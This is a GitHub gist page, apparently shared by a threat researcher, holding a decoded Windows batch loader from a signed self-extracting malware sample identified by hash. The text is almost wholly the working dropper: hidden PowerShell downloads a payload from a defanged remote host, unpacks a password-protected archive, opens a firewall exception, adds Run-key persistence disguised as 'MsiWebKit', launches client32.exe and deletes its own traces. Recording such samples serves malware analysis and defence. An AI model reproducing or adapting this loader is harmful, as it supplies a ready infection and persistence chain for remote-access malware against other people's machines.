2019-02-24-decoded-batch-from-sfx-signed-loader.vk
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // decoded batch script loader from 73ca5dd6d49b4c296ee1304aaac2e5fde01156800b538354fd27366df5b9323f | |
| // ref -> | |
| if exist "APPDATA\new.bin" goto END | |
| ping localhost -n 6 | |
| powershell.exe -noprofile -windowstyle hidden -executionpolicy bypass $KRIIR = New-Object http://System.Net .WebClient; $KRIIR.Headers['User-Agent'] = 'Command'; $KRIIR.downloadfile('http://frameupds[.info/rwrw66/2222z.php','APPDATA\7za.exe'); | |
| powershell.exe -noprofile -windowstyle hidden -executionpolicy bypass $KRIIR = New-Object http://System.Net .WebClient; $KRIIR.Headers['User-Agent'] = 'Command'; $KRIIR.downloadfile('http://frameupds[.info/rwrw66/1111z.php','APPDATA\25520.7z'); | |
| if not exist "APPDATA\7za.exe" goto END | |
| cd "APPDATA" | |
| "APPDATA\7za.exe" x -pyoiyigne -y "APPDATA\25520.7z" -o"APPDATA" | |
| if not exist "APPDATA\home32\client32.exe" goto END | |
| netsh firewall add allowedprogram "APPDATA\home32\client32.exe" MsiWebKit ENABLE | |
| reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /f /v "MsiWebKit" /t REG_SZ /d "APPDATA\home32\client32.exe" | |
| ping localhost -n 1 | |
| start APPDATA\home32\client32.exe | |
| del /f /q "APPDATA\25520.7z" | |
| del /f /q "APPDATA\7za.exe" | |
| :END | |
| del 0 |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment